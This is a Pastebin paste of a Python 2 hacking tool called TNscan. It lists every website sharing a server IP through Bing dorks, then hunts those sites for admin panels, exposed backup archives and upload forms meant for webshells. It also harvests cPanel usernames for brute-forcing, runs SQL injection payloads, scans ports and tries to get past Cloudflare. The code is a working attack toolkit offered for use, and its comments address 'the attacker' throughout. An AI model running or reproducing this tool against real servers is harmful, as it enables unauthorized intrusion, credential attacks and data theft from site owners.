API tools faq
paste
Advertisement
dravatar

Untitled

dravatar
May 5th, 2016
715
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.52 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2. # >>> Bism Allah <<<
  3. # Code Name : TNscan v1.0
  4. # Coder : MatriX Coder (17 yo guy from Tunisia)
  5. # Blog : www.matrixcoder.co.vu
  6. # Twitter : MatriX_Coder
  7. # Pastebin : www.pastebin.com/u/matrixcoder
  8. # this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
  9. # Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
  10. # greats also to tunisia fallega team and to madleets team and to you !
  11. # Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
  12.  
  13. import re, urllib2, urllib, os, socket, sys
  14. from platform import system
  15. logo = """
  16. \t _____ _ _
  17. \t|_ _| \ | |
  18. \t | | | \| |___ ___ __ _ _ __
  19. \t | | | . ` / __|/ __/ _` | '_ \
  20. \t | | | |\ \__ \ (_| (_| | | | |
  21. \t \_/ \_| \_/___/\___\__,_|_| |_| v1.0
  22.  
  23. """
  24.  
  25. menu = """
  26. 1) Get all websites
  27. 2) Get joomla websites
  28. 3) Get wordpress websites
  29. 4) Find control panel
  30. 5) Find zip files
  31. 6) Find upload files
  32. 7) Get server users
  33. 8) Scan from SQL injection
  34. 9) Crawl and scan from SQL injection
  35. 10) Scan ports (range of ports)
  36. 11) Scan ports (common ports )
  37. 12) Get server banner
  38. 13) Bypass Cloudflare
  39. 14) About !
  40. 99) Exit
  41. """
  42. def unique(seq):
  43. """
  44. get unique from list found it on stackoverflow
  45. """
  46. seen = set()
  47. return [seen.add(x) or x for x in seq if x not in seen]
  48.  
  49. def clearScr() :
  50. """
  51. clear the screen in case of GNU/Linux or
  52. windows
  53. """
  54. if system() == 'Linux':
  55. os.system('clear')
  56. if system() == 'Windows':
  57. os.system('cls')
  58.  
  59. class TNscan :
  60. def __init__(self, serverip) :
  61. self.serverip = serverip
  62. self.getSites(False)
  63. print menu
  64. while True :
  65. choice = raw_input(' Enter choice -> ')
  66. if choice == '1' :
  67. self.getSites(True)
  68. elif choice == '2' :
  69. self.getJoomla()
  70. elif choice == '3' :
  71. self.getWordpress()
  72. elif choice == '4' :
  73. self.findPanels()
  74. elif choice == '5' :
  75. self.findZip()
  76. elif choice == '6' :
  77. self.findUp()
  78. elif choice == '7' :
  79. self.getUsers()
  80. elif choice == '8' :
  81. self.grabSqli()
  82. elif choice == '9' :
  83. nbpages = int(raw_input(' Enter number of pages to crawl (ex : 100) -> '))
  84. self.crawlSqli(nbpages)
  85. elif choice == '10' :
  86. ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
  87. self.portScanner(1, ran)
  88. elif choice == '11' :
  89. self.portScanner(2, None)
  90. elif choice == '12' :
  91. self.getServerBanner()
  92. elif choice == '13' :
  93. self.cloudflareBypasser()
  94. elif choice == '14' :
  95. self.aboutME()
  96. elif choice == '99' :
  97. print ' Goodbye'
  98. exit()
  99. con = raw_input(' Continue [Y/n] -> ')
  100. if con[0].upper() == 'N' :
  101. exit()
  102. else :
  103. clearScr()
  104. print logo
  105. print menu
  106.  
  107. def aboutME(self) :
  108. clearScr()
  109. print """
  110. >>> Bism Allah <<<
  111. Code Name : TNscan v1.0
  112. Coder : MatriX Coder (17 yo guy from Tunisia)
  113. Blog : www.matrixcoder.co.vu
  114. Twitter : MatriX_Coder
  115. Pastebin : www.pastebin.com/u/matrixcoder
  116. this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
  117. Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
  118. greats also to tunisian fallega team, to madleets team and to you !
  119. Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
  120. """
  121.  
  122. def getSites(self, a) :
  123. """
  124. get all websites on same server
  125. from bing search
  126. """
  127. lista = []
  128. page = 1
  129. while page <= 101:
  130. try:
  131. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
  132. openbing = urllib2.urlopen(bing)
  133. readbing = openbing.read()
  134. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  135. for i in range(len(findwebs)):
  136. allnoclean = findwebs[i]
  137. findall1 = re.findall('http://(.*?)/', allnoclean)
  138. for idx, item in enumerate(findall1):
  139. if 'www' not in item:
  140. findall1[idx] = 'http://www.' + item + '/'
  141. else:
  142. findall1[idx] = 'http://' + item + '/'
  143. lista.extend(findall1)
  144.  
  145. page += 50
  146. except urllib2.URLError:
  147. pass
  148. self.sites = unique(lista)
  149. if a :
  150. clearScr()
  151. print '[*] Found ', len(lista), ' Website\n'
  152. for site in self.sites :
  153. print site
  154.  
  155. def getWordpress(self) :
  156. """
  157. get wordpress site using a dork the attacker
  158. may do a password list attack (i did a tool for that purpose check my pastebin)
  159. or scan for common vulnerabilities using wpscan for example (i did a simple tool
  160. for multi scanning using wpscan)
  161. """
  162. lista = []
  163. page = 1
  164. while page <= 101:
  165. try:
  166. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
  167. openbing = urllib2.urlopen(bing)
  168. readbing = openbing.read()
  169. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  170. for i in range(len(findwebs)):
  171. wpnoclean = findwebs[i]
  172. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
  173. lista.extend(findwp)
  174. page += 50
  175. except:
  176. pass
  177. lista = unique(lista)
  178. clearScr()
  179. print '[*] Found ', len(lista), ' Wordpress Website\n'
  180. for site in lista :
  181. print site
  182.  
  183. def getJoomla(self) :
  184. """
  185. get all joomla websites using
  186. bing search the attacker may bruteforce
  187. or scan them
  188. """
  189. lista = []
  190. page = 1
  191. while page <= 101:
  192. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
  193. openbing = urllib2.urlopen(bing)
  194. readbing = openbing.read()
  195. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  196. for i in range(len(findwebs)):
  197. jmnoclean = findwebs[i]
  198. findjm = re.findall('(.*?)index.php', jmnoclean)
  199. lista.extend(findjm)
  200. page += 50
  201. lista = unique(lista)
  202. clearScr()
  203. print '[*] Found ', len(lista), ' Joomla Website\n'
  204. for site in lista :
  205. print site
  206.  
  207.  
  208. def findPanels(self) :
  209. """
  210. find panels from grabbed websites
  211. the attacker may do a lot of vulnerabilty
  212. tests on the admin area
  213. """
  214. print "[~] Finding admin panels"
  215. adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
  216. clearScr()
  217. for site in self.sites :
  218. for admin in adminList :
  219. try :
  220. if urllib.urlopen(site + admin).getcode() == 200 :
  221. print " [*] Found admin panel -> ", site + admin
  222. except IOError :
  223. pass
  224.  
  225. def findZip(self) :
  226. """
  227. find zip files from grabbed websites
  228. it may contain useful informations
  229. """
  230. zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
  231. clearScr()
  232. print "[~] Finding zip file"
  233. for site in self.sites :
  234. for zip1 in zipList :
  235. try:
  236. if urllib.urlopen(site + zip1).getcode() == 200 :
  237. print " [*] Found zip file -> ", site + zip1
  238. except IOError :
  239. pass
  240.  
  241. def findUp(self) :
  242. """
  243. find upload forms from grabbed
  244. websites the attacker may succeed to
  245. upload malicious files like webshells
  246. """
  247. upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
  248. clearScr()
  249. print "[~] Finding Upload"
  250. for site in self.sites :
  251. for up in upList :
  252. try :
  253. if (urllib.urlopen(site + up).getcode() == 200) :
  254. html = urllib.urlopen(site + up).readlines()
  255. for line in html :
  256. if re.findall('type=file', line) :
  257. print " [*] Found upload -> ", site+up
  258. except IOError :
  259. pass
  260.  
  261. def getUsers(self) :
  262. """
  263. get server users using a method found by
  264. iranian hackers i think, the attacker may
  265. do a bruteforce attack on CPanel, ssh, ftp or
  266. even mysql if it supports remote login
  267. (you can use medusa or hydra)
  268. """
  269. clearScr()
  270. print "[~] Grabbing Users"
  271. userslist = []
  272. for site1 in self.sites :
  273. try:
  274. site = site1
  275. site = site.replace('http://www.', '')
  276. site = site.replace('http://', '')
  277. site = site.replace('.', '')
  278. if '-' in site:
  279. site = site.replace('-', '')
  280. site = site.replace('/', '')
  281. while len(site) > 2:
  282. resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
  283. if 'invalid username' not in resp.lower():
  284. print '\t [*] Found -> ', site
  285. userslist.append(site)
  286. break
  287. else :
  288. print site
  289.  
  290. site = site[:-1]
  291. except:
  292. pass
  293.  
  294. clearScr()
  295. for user in userslist :
  296. print user
  297.  
  298.  
  299. def cloudflareBypasser(self) :
  300. """
  301. trys to bypass cloudflare i already wrote
  302. in my blog how it works, i learned this
  303. method from a guy in madleets
  304. """
  305. clearScr()
  306. print "[~] Bypassing cloudflare"
  307. subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
  308. for site in self.sites :
  309. site.replace('http://', '')
  310. site.replace('/', '')
  311. try:
  312. ip = socket.gethostbyname(site)
  313. except socket.error:
  314. pass
  315. for sub in subdoms:
  316. doo = sub + '.' + site
  317. print ' [~] Trying -> ', doo
  318. try:
  319. ddd = socket.gethostbyname(doo)
  320. if ddd != ip:
  321. print ' [*] Cloudflare bypassed -> ', ddd
  322. break
  323. except socket.error :
  324. pass
  325.  
  326. def getServerBanner(self) :
  327. """
  328. simply gets the server banner
  329. the attacker may benefit from it
  330. like getting the server side software
  331. """
  332. clearScr()
  333. try:
  334. s = 'http://' + self.serverip
  335. httpresponse = urllib.urlopen(s)
  336. print ' [*] Server header -> ', httpresponse.headers.getheader('server')
  337. except:
  338. pass
  339.  
  340. def grabSqli(self) :
  341. """
  342. just grabs all websites in server with php?id= dork
  343. for scanning for error based sql injection
  344. """
  345. page = 1
  346. lista = []
  347. while page <= 101:
  348. try:
  349. bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
  350. openbing = urllib2.urlopen(bing)
  351. readbing = openbing.read()
  352. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  353. for i in range(len(findwebs)):
  354. x = findwebs[i]
  355. lista.append(x)
  356. except:
  357. pass
  358. page += 50
  359. lista = unique(lista)
  360. self.checkSqli(lista)
  361.  
  362. def checkSqli(self, s):
  363. """
  364. checks for error based sql injection,
  365. most of the codes here are from webpwn3r
  366. project the one who has found an lfi in
  367. yahoo as i remember, you can find a separate
  368. tool in my blog
  369. """
  370. clearScr()
  371. print "[~] Checking SQL injection"
  372. payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
  373. check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
  374. for url in s:
  375. try:
  376. for param in url.split('?')[1].split('&'):
  377. for payload in payloads:
  378. power = url.replace(param, param + payload.strip())
  379. #print power
  380. html = urllib2.urlopen(power).readlines()
  381. for line in html:
  382. checker = re.findall(check, line)
  383. if len(checker) != 0 :
  384. print ' [*] SQLi found -> ', power
  385. except:
  386. pass
  387.  
  388. def crawlSqli(self, nbpages) :
  389. """
  390. simple crawling using chilkat (yeah chilkat sucks)
  391. and scan for error based sql injection
  392. [!] will be on the next version
  393. """
  394. import chilkat
  395. spider = chilkat.CkSpider()
  396. for url in self.sites :
  397. spidred = []
  398. print " [~] Crawling -> ", url
  399. spider.Initialize(url)
  400. #spider.unspideredUrl(url)
  401. i = 0
  402. for i in range(nbpages) :
  403. if spider.CrawlNext() :
  404. spidred.append(spider.lastUrl())
  405. print " [+] Crawled -> ", spidred
  406. print " [~] Scanning -> ", url, " from SQL injection"
  407. self.checkSqli(spidred)
  408.  
  409. def portScanner(self, mode, ran) :
  410. """
  411. simple port scanner works with range of ports
  412. or with common ports (al-swisre idea)
  413. """
  414. clearScr()
  415. print "[~] Scanning Ports"
  416. def do_it(ip, port):
  417. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  418. #sock.settimeout(5)
  419. sock = sock.connect_ex((ip,port))
  420. if sock == 0:
  421. print " [*] Port %i is open" % port
  422.  
  423. if mode == 1 :
  424. a = ran.split('-')
  425. start = int(a[0])
  426. end = int(a[1])
  427. for i in range(start, end):
  428. do_it(self.serverip, i)
  429. elif mode == 2 :
  430. for port in [80,21,22,2082,25,53,110,443,143] :
  431. # didn't use multithreading cos it's few ports
  432. do_it(self.serverip, port)
  433.  
  434. if __name__ == '__main__' :
  435. try :
  436. clearScr()
  437. print logo
  438. TNscan(sys.argv[1])
  439. except IndexError :
  440. print " [*] Usage : python "+sys.argv[0]+" 127.0.0.1"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!